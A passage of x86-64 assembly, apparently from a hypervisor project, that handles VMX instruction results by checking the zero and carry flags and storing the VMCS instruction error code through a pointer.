vmread %rdx, (%rsi)
jmp vmx_check_error
/*
** VMX insn error checks
*/
vmx_check_error:
jz vmx_fail_valid
jc vmx_fail_invalid
vmx_success:
mov $1, %rax
ret
/*
** VM Fail Valid : ZF=1
**
** read VMCS instruction error (0x4400)
** store it to (%rdi)
*/
vmx_fail_valid:
push %rdx
mov $0x4400, %rdx
vmread %rdx, (%rdi)
pop %rdx
jmp vmx_fail
/*
** VM Fail Invalid : CF=1
**
** VMCS instruction error code is 0
*/
vmx_fail_invalid:
movl $0, (%rdi)
vmx_fail:
xor %rax, %rax
ret
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.